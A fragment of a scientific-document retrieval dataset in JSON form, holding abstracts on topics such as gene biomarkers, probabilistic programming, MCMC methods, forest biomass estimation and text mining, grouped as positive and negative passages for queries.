"text": "In this paper, multimodal Deep Boltzmann Machines (DBM) is employed to learn important genes (biomarkers) on gene expression data from human carcinoma colorectal. The learning process involves gene expression data and several patient phenotypes such as lymph node and distant metastasis occurrence. The proposed framework in this paper uses multimodal DBM to train records with metastasis occurrence. Later, the trained model is tested using records with no metastasis occurrence. After that, Mean Squared Error (MSE) is measured from the reconstructed and the original gene expression data. Genes are ranked based on the MSE value. The first gene has the highest MSE value. After that, k-means clustering is performed using various number of genes. Features that give the highest purity index are considered as the important genes. The important genes obtained from the proposed framework and two sample t-test are being compared. From the accuracy of metastasis classification, the proposed framework gives higher results compared to the top genes from two sample t-test.",
"title": ""
},
{
"docid": "5d550089b4b4e09a8845695316eab7c6",
"text": "Objective: The aim of this study was to determine functional status and QoL of children with spina bifida (SB) by using the Functional Independence Measure for Children (WeeFIM) and the Child Health Questionnaire PF-50 (CHQPF-50) and to compare the functional status data of pediatric SB patients with those of healthy children. Material and Methods: Forty children with SB and 40 healthy children aged between 36 and 143 months were enrolled in the study. Both pediatric SB patients and healthy children were divided into three age groups: Group 1: 36-71 months, Group 2: 72-107 months, and Group 3: 108-143 months. The WeeFIM and CHQPF-50 were completed for children with SB, whereas the WeeFIM was completed only for healthy children. Results: In both assessments, the total score and subscale scores were lower than normal values in children with SB. However, improvement was found in self-care; communication; social, emotional, and mental status; and family factors with increasing age. On the other hand, there was no improvement in physical score, transfer, mobility, and sphincter control with increasing age. Functional status of children with SB was significantly lower compared to healthy children. Conclusion: There was progress in self-care, communication, family factors, and social, emotional and mental status in children with SB with increasing age.",
"title": ""
},
{
"docid": "bcfc8566cf73ec7c002dcca671e3a0bd",
"text": "of the thoracic spine revealed a 1.1 cm intradural extramedullary mass at the level of the T2 vertebral body (Figure 1a). Spinal neurosurgery was planned due to exacerbation of her chronic back pain and progressive weakness of the lower limbs at 28 weeks ’ gestation. Emergent spinal decompression surgery was performed with gross total excision of the tumour. Doppler fl ow of the umbilical artery was used preoperatively and postoperatively to monitor fetal wellbeing. Th e histological examination revealed HPC, World Health Organization (WHO) grade 2 (Figure 1b). Complete recovery was seen within 1 week of surgery. Follow-up MRI demonstrated complete removal of the tumour. We recommended adjuvant external radiotherapy to the patient in the 3rd trimester of pregnancy due to HPC ’ s high risk of recurrence. However, the patient declined radiotherapy. Routine weekly obstetric assessments were performed following surgery. At the 37th gestational week, a 2,850 g, Apgar score 7 – 8, healthy infant was delivered by caesarean section, without need of admission to the neonatal intensive care unit. Adjuvant radiotherapy was administered to the patient in the postpartum period.",
"title": ""
},
{
"docid": "c7d629a83de44e17a134a785795e26d8",
"text": "How can firms profitably give away free products? This paper provides a novel answer and articulates tradeoffs in a space of information product design. We introduce a formal model of two-sided network externalities based in textbook economics—a mix of Katz & Shapiro network effects, price discrimination, and product differentiation. Externality-based complements, however, exploit a different mechanism than either tying or lock-in even as they help to explain many recent strategies such as those of firms selling operating systems, Internet browsers, games, music, and video. The model presented here argues for three simple but useful results. First, even in the absence of competition, a firm can rationally invest in a product it intends to give away into perpetuity. Second, we identify distinct markets for content providers and end consumers and show that either can be a candidate for a free good. Third, product coupling across markets can increase consumer welfare even as it increases firm profits. The model also generates testable hypotheses on the size and direction of network effects while offering insights to regulators seeking to apply antitrust law to network markets. ACKNOWLEDGMENTS: We are grateful to participants of the 1999 Workshop on Information Systems and Economics, the 2000 Association for Computing Machinery SIG E-Commerce, the 2000 International Conference on Information Systems, the 2002 Stanford Institute for Theoretical Economics (SITE) workshop on Internet Economics, the 2003 Insitut D’Economie Industrielle second conference on “The Economics of the Software and Internet Industries,” as well as numerous participants at university seminars. We wish to thank Tom Noe for helpful observations on oligopoly markets, Lones Smith, Kai-Uwe Kuhn, and Jovan Grahovac for corrections and model generalizations, Jeff MacKie-Mason for valuable feedback on model design and bundling, and Hal Varian for helpful comments on firm strategy and model implications. Frank Fisher provided helpful advice on and knowledge of the Microsoft trial. Jean Tirole provided useful suggestions and examples, particularly in regard to credit card markets. Paul Resnick proposed the descriptive term “internetwork” externality to describe two-sided network externalities. Tom Eisenmann provided useful feedback and examples. We also thank Robert Gazzale, Moti Levi, and Craig Newmark for their many helpful observations. This research has been supported by NSF Career Award #IIS 9876233. For an earlier version of the paper that also addresses bundling and competition, please see “Information Complements, Substitutes, and Strategic Product Design,” November 2000, http://ssrn.com/abstract=249585.",
"title": ""
},
{
"docid": "ecda1d7fb7e05f6d7c63e38fb8f424b8",
"text": "Auto dynamic difficulty (ADD) is the technique of automatically changing the level of difficulty of a video game in real time to match player expertise. Recreating an ADD system on a game-by-game basis is both expensive and time consuming, ultimately limiting its usefulness. Thus, we leverage the benefits of software design patterns to construct an ADD framework. In this paper, we discuss a number of desirable software quality attributes that can be achieved through the usage of these design patterns, based on a case study of two video games.",
"title": ""
},
{
"docid": "61df2a452626b80ce815a0b9528a580b",
"text": "The nice guy stereotype asserts that, although women often say that they wish to date kind, sensitive men, when actually given a choice, women will reject nice men in favor of men with other salient characteristics, such as physical attractiveness. To explore this stereotype, two studies were conducted. In Study 1, 48 college women were randomly assigned into experimental conditions in which they read a script that depicted 2 men competing for a date with a woman. The niceness of 1 target man’s responses was manipulated across conditions. In Study 2, 194 college women were randomly assigned to conditions in which both the target man’s responses and his physical attractiveness were manipulated. Overall results indicated that both niceness and physical attractiveness were positive factors in women’s choices and desirability ratings of the target men. Niceness appeared to be the most salient factor when it came to desirability for more serious relationships, whereas physical attractiveness appeared more important in terms of desirability for more casual, sexual relationships.",
"title": ""
},
{
"docid": "5dcf33299ebbf8b1de1a8e162a7859c1",
"text": "Firstly, olfactory association learning was used to determine the modulating effect of 5-HT4 receptor involvement in learning and long-term memory. Secondly, the effects of systemic injections of a 5-HT4 partial agonist and an antagonist on long-term potentiation (LTP) and depotentiation in the dentate gyrus (DG) were tested in freely moving rats. The modulating role of the 5-HT4 receptors was studied by using a potent, 5-HT4 partial agonist RS 67333 [1-(4-amino-5-chloro-2-methoxyphenyl)-3-(1-n-butyl-4-piperidinyl)-1-propanone] and a selective 5-HT4 receptor antagonist RS 67532 [1-(4-amino-5-chloro-2-(3,5-dimethoxybenzyloxyphenyl)-5-(1-piperidinyl)-1-propanone]. Agonist or antagonist systemic chronic injections prior to five training sessions yielded a facilitatory effect on procedural memory during the first session only with the antagonist. Systemic injection of the antagonist only before the first training session improved procedural memory during the first session and associative memory during the second session. Similar injection with the 5-HT4 partial agonist had an opposite effect. The systemic injection of the 5-HT4 partial agonist prior to the induction of LTP in the dentate gyrus by high-frequency stimulation was followed by a population spike increase, while the systemic injection of the antagonist accelerated the depotentiation 48 h later. The behavioural and physiological results pointed out the involvement of 5-HT4 receptors in processing related to the long-term hippocampal-dependent memory system, and suggest that specific 5-HT4 agonists could be used to treat amnesic patients with a dysfunction in this particular system.",
"title": ""
},
{
"docid": "609faa087f4815eb13ee99736d793024",
"text": "This paper presents an approach to develop motorway Rear-End Crash Risk Identification Models (RECRIM) using disaggregate traffic data, meteorological data and crash database for a study site at a two-lane-per-direction section on Swiss (right-hand driving) motorway A1. Traffic data collected from inductive double loop detectors provide instant vehicle information such as speed, time headway, etc. We define traffic situations (TS) characterized by 22 variables representing traffic status for 5-minute intervals. Our goal is to develop models that can separate TS under non-crash conditions and TS under pre-crash conditions using Random Forest - an ensemble learning method. Non-crash TS were clustered into groups that we call traffic regimes (TR). Precrash TS are classified into TR so that a RECRIM for each TR is developed. Interpreting results of the models suggests that speed variance on the right lane and speed difference between two lanes are the two main causes of the rear-end crashes. The applicability of RECRIM in a real-time framework is also discussed.",
"title": ""
},
{
"docid": "75a1832a5fdd9c48f565eb17e8477b4b",
"text": "We introduce a new interactive system: a game that is fun and can be used to create valuable output. When people play the game they help determine the contents of images by providing meaningful labels for them. If the game is played as much as popular online games, we estimate that most images on the Web can be labeled in a few months. Having proper labels associated with each image on the Web would allow for more accurate image search, improve the accessibility of sites (by providing descriptions of images to visually impaired individuals), and help users block inappropriate images. Our system makes a significant contribution because of its valuable output and because of the way it addresses the image-labeling problem. Rather than using computer vision techniques, which don't work well enough, we encourage people to do the work by taking advantage of their desire to be entertained.",
"title": ""
},
{
"docid": "7f511850dd3a61fec404e817f9005792",
"text": "AIMS\nTo assess disordered online social networking use via modified diagnostic criteria for substance dependence, and to examine its association with difficulties with emotion regulation and substance use.\n\n\nDESIGN\nCross-sectional survey study targeting undergraduate students. Associations between disordered online social networking use, internet addiction, deficits in emotion regulation and alcohol use problems were examined using univariate and multivariate analyses of covariance.\n\n\nSETTING\nA large University in the Northeastern United States.\n\n\nPARTICIPANTS\nUndergraduate students (n = 253, 62.8% female, 60.9% white, age mean = 19.68, standard deviation = 2.85), largely representative of the target population. The response rate was 100%.\n\n\nMEASUREMENTS\nDisordered online social networking use, determined via modified measures of alcohol abuse and dependence, including DSM-IV-TR diagnostic criteria for alcohol dependence, the Penn Alcohol Craving Scale and the Cut-down, Annoyed, Guilt, Eye-opener (CAGE) screen, along with the Young Internet Addiction Test, Alcohol Use Disorders Identification Test, Acceptance and Action Questionnaire-II, White Bear Suppression Inventory and Difficulties in Emotion Regulation Scale.\n\n\nFINDINGS\nDisordered online social networking use was present in 9.7% [n = 23; 95% confidence interval (5.9, 13.4)] of the sample surveyed, and significantly and positively associated with scores on the Young Internet Addiction Test (P < 0.001), greater difficulties with emotion regulation (P = 0.003) and problem drinking (P = 0.03).\n\n\nCONCLUSIONS\nThe use of online social networking sites is potentially addictive. Modified measures of substance abuse and dependence are suitable in assessing disordered online social networking use. Disordered online social networking use seems to arise as part of a cluster of symptoms of poor emotion regulation skills and heightened susceptibility to both substance and non-substance addiction.",
"title": ""
},
{
"docid": "0b6846c4dd89be21af70b144c93f7a7b",
"text": "Most existing collaborative filtering models only consider the use of user feedback (e.g., ratings) and meta data (e.g., content, demographics). However, in most real world recommender systems, context information, such as time and social networks, are also very important factors that could be considered in order to produce more accurate recommendations. In this work, we address several challenges for the context aware movie recommendation tasks in CAMRa 2010: (1) how to combine multiple heterogeneous forms of user feedback? (2) how to cope with dynamic user and item characteristics? (3) how to capture and utilize social connections among users? For the first challenge, we propose a novel ranking based matrix factorization model to aggregate explicit and implicit user feedback. For the second challenge, we extend this model to a sequential matrix factorization model to enable time-aware parametrization. Finally, we introduce a network regularization function to constrain user parameters based on social connections. To the best of our knowledge, this is the first study that investigates the collective modeling of social and temporal dynamics. Experiments on the CAMRa 2010 dataset demonstrated clear improvements over many baselines.",
"title": ""
}
] | scidocsrr |
55c8b0ac0a3388e0d1169a78fa0241e6 | Venture: a higher-order probabilistic programming platform with programmable inference | [
{
"docid": "0de84142c51e72dd907804ef518195d8",
"text": "Markov chain Monte Carlo and sequential Monte Carlo methods have emerged as the two main tools to sample from high dimensional probability distributions.Although asymptotic convergence of Markov chain Monte Carlo algorithms is ensured under weak assumptions, the performance of these algorithms is unreliable when the proposal distributions that are used to explore the space are poorly chosen and/or if highly correlated variables are updated independently. We show here how it is possible to build efficient high dimensional proposal distributions by using sequential Monte Carlo methods. This allows us not only to improve over standard Markov chain Monte Carlo schemes but also to make Bayesian inference feasible for a large class of statistical models where this was not previously so. We demonstrate these algorithms on a non-linear state space model and a Lévy-driven stochastic volatility model.",
"title": ""
},
{
"docid": "351562a44f9126db2f48e2760e26af4e",
"text": "It has been widely observed that there is no single “dominant” SAT solver; instead, different solvers perform best on different instances. Rather than following the traditional approach of choosing the best solver for a given class of instances, we advocate making this decision online on a per-instance basis. Building on previous work, we describe SATzilla, an automated approach for constructing per-instance algorithm portfolios for SAT that use socalled empirical hardness models to choose among their constituent solvers. This approach takes as input a distribution of problem instances and a set of component solvers, and constructs a portfolio optimizing a given objective function (such as mean runtime, percent of instances solved, or score in a competition). The excellent performance of SATzilla was independently verified in the 2007 SAT Competition, where our SATzilla07 solvers won three gold, one silver and one bronze medal. In this article, we go well beyond SATzilla07 by making the portfolio construction scalable and completely automated, and improving it by integrating local search solvers as candidate solvers, by predicting performance score instead of runtime, and by using hierarchical hardness models that take into account different types of SAT instances. We demonstrate the effectiveness of these new techniques in extensive experimental results on data sets including instances from the most recent SAT competition.",
"title": ""
},
{
"docid": "02ed562cb1a532f937a8590226bb44dc",
"text": "We present a new algorithm for approximate inference in prob abilistic programs, based on a stochastic gradient for variational programs. Th is method is efficient without restrictions on the probabilistic program; it is pa rticularly practical for distributions which are not analytically tractable, inclu ding highly structured distributions that arise in probabilistic programs. We show ho w t automatically derive mean-field probabilistic programs and optimize them , and demonstrate that our perspective improves inference efficiency over other al gorithms.",
"title": ""
}
] | [
{
"docid": "56c75286b03f3a643ef0ade81edd9254",
"text": "The data saturation problem in Landsat imagery is well recognized and is regarded as an important factor resulting in inaccurate forest aboveground biomass (AGB) estimation. However, no study has examined the saturation values for different vegetation types such as coniferous and broadleaf forests. The objective of this study is to estimate the saturation values in Landsat imagery for different vegetation types in a subtropical region and to explore approaches to improving forest AGB estimation. Landsat Thematic Mapper imagery, digital elevation model data, and field measurements in Zhejiang province of Eastern China were used. Correlation analysis and scatterplots were first used to examine specific spectral bands and their relationships with AGB. A spherical model was then used to quantitatively estimate the saturation value of AGB for each vegetation type. A stratification of vegetation types and/or slope aspects was used to determine the potential to improve AGB estimation performance by developing a specific AGB estimation model for each category. Stepwise regression analysis based on Landsat spectral signatures and textures using grey-level co-occurrence matrix (GLCM) was used to develop AGB estimation models for different scenarios: non-stratification, stratification based on either vegetation types, slope aspects, or the combination of vegetation types and slope aspects. The results indicate that pine forest and mixed forest have the highest AGB saturation values (159 and 152 Mg/ha, respectively), Chinese fir and broadleaf forest have lower saturation values (143 and 123 Mg/ha, respectively), and bamboo forest and shrub have the lowest saturation values (75 and 55 Mg/ha, respectively). The stratification based on either vegetation types or slope aspects provided smaller root mean squared errors (RMSEs) than non-stratification. The AGB estimation models based on stratification of both vegetation types and slope aspects provided the most accurate estimation with the smallest RMSE of 24.5 Mg/ha. Relatively low AGB (e.g., less than 40 Mg/ha) sites resulted in overestimation and higher AGB (e.g., greater than 140 Mg/ha) sites resulted in underestimation. The smallest RMSE was obtained when AGB was 80–120 Mg/ha. This research indicates the importance of stratification in mitigating the data saturation problem, thus improving AGB estimation.",
"title": ""
},
{
"docid": "7e1b4fe1dcc7386edfd7e1ac17661ced",
"text": "Means and standard deviations are reported for the State-Trait Anxiety Inventory and the Zung Self-Rating Depression scale, collected during the course of a general health survey. Data for different age samples and for both sexes are presented for use in the evaluation of the significance of anxiety and depression levels in patients presenting with these symptoms. High estimates of reliability based on internal consistency statistics were found for all scales. Females scored more highly on both the measures and scores were inversely correlated with age, indicating the importance of specific and appropriate norms in assessing affective states.",
"title": ""
},
{
"docid": "f8e3b21fd5481137a80063e04e9b5488",
"text": "On the basis of the notion that the ability to exert self-control is critical to the regulation of aggressive behaviors, we suggest that mindfulness, an aspect of the self-control process, plays a key role in curbing workplace aggression. In particular, we note the conceptual and empirical distinctions between dimensions of mindfulness (i.e., mindful awareness and mindful acceptance) and investigate their respective abilities to regulate workplace aggression. In an experimental study (Study 1), a multiwave field study (Study 2a), and a daily diary study (Study 2b), we established that the awareness dimension, rather than the acceptance dimension, of mindfulness plays a more critical role in attenuating the association between hostility and aggression. In a second multiwave field study (Study 3), we found that mindful awareness moderates the association between hostility and aggression by reducing the extent to which individuals use dysfunctional emotion regulation strategies (i.e., surface acting), rather than by reducing the extent to which individuals engage in dysfunctional thought processes (i.e., rumination). The findings are discussed in terms of the implications of differentiating the dimensions and mechanisms of mindfulness for regulating workplace aggression. (PsycINFO Database Record",
"title": ""
},
{
"docid": "91382399e6341aed45a00b8fa3203005",
"text": "This paper presents a circularly polarized antenna on thin and flexible Denim substrate for Industrial, Scientific and Medical (ISM) band and Wireless Body Area Network (WBAN) applications at 2.45 GHz. Copper tape is used as the conductive material on 1 mm thick Denim substrate. Circular polarization is achieved by introducing rectangular slot along diagonal axes at the center of the circular patch radiator. Bandwidth enhancement is done using partial and slotted ground plane. The measured impedance bandwidth of the proposed antenna is 6.4 % (2.42 GHz to 2.58 GHz) or 160 MHz. The antenna exhibits good radiation characteristics with gain of 2.25 dB. Simulated and measured results are presented to validate the operability of antenna within the proposed frequency bands.",
"title": ""
},
{
"docid": "c51462988ce97a93da02e00af075127b",
"text": "By using mirror reflections of a scene, stereo images can be captured with a single camera (catadioptric stereo). In addition to simplifying data acquisition single camera stereo provides both geometric and radiometric advantages over traditional two camera stereo. In this paper, we discuss the geometry and calibration of catadioptric stereo with two planar mirrors. In particular, we will show that the relative orientation of a catadioptric stereo rig is restricted to the class of planar motions thus reducing the number of external calibration parameters from 6 to 5. Next we derive the epipolar geometry for catadioptric stereo and show that it has 6 degrees of freedom rather than 7 for traditional stereo. Furthermore, we show how focal length can be recovered from a single catadioptric image solely from a set of stereo correspondences. To test the accuracy of the calibration we present a comparison to Tsai camera calibration and we measure the quality of Euclidean reconstruction. In addition, we will describe a real-time system which demonstrates the viability of stereo with mirrors as an alternative to traditional two camera stereo.",
"title": ""
},
{
"docid": "146d5e7a8079a0b5171d9bc2813f3052",
"text": "The Shape Boltzmann Machine (SBM) [1] has recently been introduced as a stateof-the-art model of foreground/background object shape. We extend the SBM to account for the foreground object’s parts. Our new model, the Multinomial SBM (MSBM), can capture both local and global statistics of part shapes accurately. We combine the MSBM with an appearance model to form a fully generative model of images of objects. Parts-based object segmentations are obtained simply by performing probabilistic inference in the model. We apply the model to two challenging datasets which exhibit significant shape and appearance variability, and find that it obtains results that are comparable to the state-of-the-art. There has been significant focus in computer vision on object recognition and detection e.g. [2], but a strong desire remains to obtain richer descriptions of objects than just their bounding boxes. One such description is a parts-based object segmentation, in which an image is partitioned into multiple sets of pixels, each belonging to either a part of the object of interest, or its background. The significance of parts in computer vision has been recognized since the earliest days of the field (e.g. [3, 4, 5]), and there exists a rich history of work on probabilistic models for parts-based segmentation e.g. [6, 7]. Many such models only consider local neighborhood statistics, however several models have recently been proposed that aim to increase the accuracy of segmentations by also incorporating prior knowledge about the foreground object’s shape [8, 9, 10, 11]. In such cases, probabilistic techniques often mainly differ in how accurately they represent and learn about the variability exhibited by the shapes of the object’s parts. Accurate models of the shapes and appearances of parts can be necessary to perform inference in datasets that exhibit large amounts of variability. In general, the stronger the models of these two components, the more performance is improved. A generative model has the added benefit of being able to generate samples, which allows us to visually inspect the quality of its understanding of the data and the problem. Recently, a generative probabilistic model known as the Shape Boltzmann Machine (SBM) has been used to model binary object shapes [1]. The SBM has been shown to constitute the state-of-the-art and it possesses several highly desirable characteristics: samples from the model look realistic, and it generalizes to generate samples that differ from the limited number of examples it is trained on. The main contributions of this paper are as follows: 1) In order to account for object parts we extend the SBM to use multinomial visible units instead of binary ones, resulting in the Multinomial Shape Boltzmann Machine (MSBM), and we demonstrate that the MSBM constitutes a strong model of parts-based object shape. 2) We combine the MSBM with an appearance model to form a fully generative model of images of objects (see Fig. 1). We show how parts-based object segmentations can be obtained simply by performing probabilistic inference in the model. We apply our model to two challenging datasets and find that in addition to being principled and fully generative, the model’s performance is comparable to the state-of-the-art.",
"title": ""
},
{
"docid": "a917a0ed4f9082766aeef29cb82eeb27",
"text": "Roles represent node-level connectivity patterns such as star-center, star-edge nodes, near-cliques or nodes that act as bridges to different regions of the graph. Intuitively, two nodes belong to the same role if they are structurally similar. Roles have been mainly of interest to sociologists, but more recently, roles have become increasingly useful in other domains. Traditionally, the notion of roles were defined based on graph equivalences such as structural, regular, and stochastic equivalences. We briefly revisit these early notions and instead propose a more general formulation of roles based on the similarity of a feature representation (in contrast to the graph representation). This leads us to propose a taxonomy of three general classes of techniques for discovering roles that includes (i) graph-based roles, (ii) feature-based roles, and (iii) hybrid roles. We also propose a flexible framework for discovering roles using the notion of similarity on a feature-based representation. The framework consists of two fundamental components: (a) role feature construction and (b) role assignment using the learned feature representation. We discuss the different possibilities for discovering feature-based roles and the tradeoffs of the many techniques for computing them. Finally, we discuss potential applications and future directions and challenges.",
"title": ""
},
{
"docid": "4290b4ba8000aeaf24cd7fb8640b4570",
"text": "Drawing on semi-structured interviews and cognitive mapping with 14 craftspeople, this paper analyzes the socio-technical arrangements of people and tools in the context of workspaces and productivity. Using actor-network theory and the concept of companionability, both of which emphasize the role of human and non-human actants in the socio-technical fabrics of everyday life, I analyze the relationships between people, productivity and technology through the following themes: embodiment, provenance, insecurity, flow and companionability. The discussion section develops these themes further through comparison with rhetoric surrounding the Internet of Things (IoT). By putting the experiences of craftspeople in conversation with IoT rhetoric, I suggest several policy interventions for understanding connectivity and inter-device operability as material, flexible and respectful of human agency.",
"title": ""
},
{
"docid": "f00346b04e9333a7fd4647d3b23c855d",
"text": "App developers would like to know the characteristics of app releases that achieve high impact. To address this, we mined the most consistently popular Google Play and Windows Phone apps, once per week, over a period of 12 months. In total we collected 3,187 releases, from which we identified 1,547 for which there was adequate prior and posterior time series data to facilitate causal impact assessment, analysing the properties that distinguish impactful and non-impactful releases. We find that 40% of target releases impacted performance in the Google store and 55% of target releases impacted performance in the Windows store. We find evidence that more mentions of features and fewer mentions of bug fixing can increase the chance for a release to be impactful, and to improve rating. UCL DEPARTMENT OF COMPUTER SCIENCE",
"title": ""
},
{
"docid": "84c37ea2545042a2654b162491846628",
"text": "Ever since the agile manifesto was created in 2001, the research community has devoted a great deal of attention to agile software development. This article examines publications and citations to illustrate how the research on agile has progressed in the 10 years following the articulation of the manifesto. nformation systems Xtreme programming, XP",
"title": ""
},
{
"docid": "4afdb551efb88711ffe3564763c3806a",
"text": "This article applied GARCH model instead AR or ARMA model to compare with the standard BP and SVM in forecasting of the four international including two Asian stock markets indices.These models were evaluated on five performance metrics or criteria. Our experimental results showed the superiority of SVM and GARCH models, compared to the standard BP in forecasting of the four international stock markets indices.",
"title": ""
},
{
"docid": "30db2040ab00fd5eec7b1eb08526f8e8",
"text": "We formulate an equivalence between machine learning and the formulation of statistical data assimilation as used widely in physical and biological sciences. The correspondence is that layer number in a feedforward artificial network setting is the analog of time in the data assimilation setting. This connection has been noted in the machine learning literature. We add a perspective that expands on how methods from statistical physics and aspects of Lagrangian and Hamiltonian dynamics play a role in how networks can be trained and designed. Within the discussion of this equivalence, we show that adding more layers (making the network deeper) is analogous to adding temporal resolution in a data assimilation framework. Extending this equivalence to recurrent networks is also discussed. We explore how one can find a candidate for the global minimum of the cost functions in the machine learning context using a method from data assimilation. Calculations on simple models from both sides of the equivalence are reported. Also discussed is a framework in which the time or layer label is taken to be continuous, providing a differential equation, the Euler-Lagrange equation and its boundary conditions, as a necessary condition for a minimum of the cost function. This shows that the problem being solved is a two-point boundary value problem familiar in the discussion of variational methods. The use of continuous layers is denoted “deepest learning.” These problems respect a symplectic symmetry in continuous layer phase space. Both Lagrangian versions and Hamiltonian versions of these problems are presented. Their well-studied implementation in a discrete time/layer, while respecting the symplectic structure, is addressed. The Hamiltonian version provides a direct rationale for backpropagation as a solution method for a certain two-point boundary value problem.",
"title": ""
},
{
"docid": "617aca6820f774473944b9bfe822cc81",
"text": "Dental implant surgery has become routine treatment in dentistry and is generally considered to be a safe surgical procedure with a high success rate. However, complications should be taken into consideration because they can follow dental implant surgery as with any other surgical procedure. Many of the complications can be resolved without severe problems; however, in some cases, they can cause dental implant failure or even lifethreatening circumstances. Avoiding complications begins with careful treatment planning based on accurate preoperative anatomic evaluations and an understanding of all potential problems. This chapter contains surgical complications associated with dental implant surgery and management.",
"title": ""
},
{
"docid": "64baa8b11855ad6333ae67f18c6b56b0",
"text": "The covariance matrix adaptation evolution strategy (CMA-ES) rates among the most successful evolutionary algorithms for continuous parameter optimization. Nevertheless, it is plagued with some drawbacks like the complexity of the adaptation process and the reliance on a number of sophisticatedly constructed strategy parameter formulae for which no or little theoretical substantiation is available. Furthermore, the CMA-ES does not work well for large population sizes. In this paper, we propose an alternative – simpler – adaptation step of the covariance matrix which is closer to the ”traditional” mutative self-adaptation. We compare the newly proposed algorithm, which we term the CMSA-ES, with the CMA-ES on a number of different test functions and are able to demonstrate its superiority in particular for large population sizes.",
"title": ""
},
{
"docid": "f5e38c2f59aeb23b951dbe17ffe5729c",
"text": "The microblogging service Twitter is in the process of being appropriated for conversational interaction and is starting to be used for collaboration, as well. In an attempt to determine how well Twitter supports user-to-user exchanges, what people are using Twitter for, and what usage or design modifications would make it (more) usable as a tool for collaboration, this study analyzes a corpus of naturally-occurring public Twitter messages (tweets), focusing on the functions and uses of the @ sign and the coherence of exchanges. The findings reveal a surprising degree of conversationality, facilitated especially by the use of @ as a marker of addressivity, and shed light on the limitations of Twitter's current design for collaborative use.",
"title": ""
},
{
"docid": "1e558e1156af502303eb1016f48949d0",
"text": "R. W. White (1959) proposed that certain motives, such as curiosity, autonomy, and play (called intrinsic motives, or IMs), have common characteristics that distinguish them from drives. The evidence that mastery is common to IMs is anecdotal, not scientific. The assertion that “intrinsic enjoyment” is common to IMs exaggerates the significance of pleasure in human motivation and expresses the hedonistic fallacy of confusing consequence for cause. Nothing has been shown scientifically to be common to IMs that differentiates them from drives. An empirically testable theory of 16 basic desires is put forth based on psychometric research and subsequent behavior validation. The desires are largely unrelated to each other and may have different evolutionary histories.",
"title": ""
},
{
"docid": "c5f6a559d8361ad509ec10bbb6c3cc9b",
"text": "In this paper we present a system for automatic story generation that reuses existing stories to produce a new story that matches a given user query. The plot structure is obtained by a case-based reasoning (CBR) process over a case base of tales and an ontology of explicitly declared relevant knowledge. The resulting story is generated as a sketch of a plot described in natural language by means of natural language generation (NLG) techniques.",
"title": ""
},
{
"docid": "f0b02824162279793d2c29f8aa7e28a2",
"text": "Text mining is a very exciting research area as it tries to discover knowledge from unstructured texts. These texts can be found on a computer desktop, intranets and the internet. The aim of this paper is to give an overview of text mining in the contexts of its techniques, application domains and the most challenging issue. The focus is given on fundamentals methods of text mining which include natural language possessing and information extraction. This paper also gives a short review on domains which have employed text mining. The challenging issue in text mining which is caused by the complexity in a natural language is also addressed in this paper.",
"title": ""
},
{
"docid": "ea525c15c1cbb4a4a716e897287fd770",
"text": "This study explored student teachers’ cognitive presence and learning achievements by integrating the SOP Model in which self-study (S), online group discussion (O) and double-stage presentations (P) were implemented in the flipped classroom. The research was conducted at a university in Taiwan with 31 student teachers. Preand post-worksheets measuring knowledge of educational issues were administered before and after group discussion. Quantitative content analysis and behavior sequential analysis were used to evaluate cognitive presence, while a paired-samples t-test analyzed learning achievement. The results showed that the participants had the highest proportion of “Exploration,” the second largest rate of “Integration,” but rarely reached “Resolution.” The participants’ achievements were greatly enhanced using the SOP Model in terms of the scores of the preand post-worksheets. Moreover, the groups with a higher proportion of “Integration” (I) and “Resolution” (R) performed best in the post-worksheets and were also the most progressive groups. Both highand low-rated groups had significant correlations between the “I” and “R” phases, with “I” “R” in the low-rated groups but “R” “I” in the high-rated groups. The instructional design of the SOP Model can be a reference for future pedagogical implementations in the higher educational context.",
"title": ""
},
{
"docid": "250bb85dc0659f21ba8bbaa42b9b30ce",
"text": "The hippocampus and surrounding regions of the medial temporal lobe play a central role in all neuropsychological theories of memory. It is still a matter of debate, however, how best to characterise the functions of these regions, the hippocampus in particular. In this article, I examine the proposal that the hippocampus is a \"stupid\" module whose specific domain is consciously apprehended information. A number of interesting consequences for the organisation of memory and the brain follow from this proposal and the assumptions it entails. These, in turn, have important implications for neuropsychological theories of recent and remote episodic, semantic, and spatial memory and for the functions that episodic memory may serve in perception, comprehension, planning, imagination, and problem solving. I consider these implications by selectively reviewing the literature and primarily drawing on research my collaborators and I have conducted.",
"title": ""
}
] | scidocsrr |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.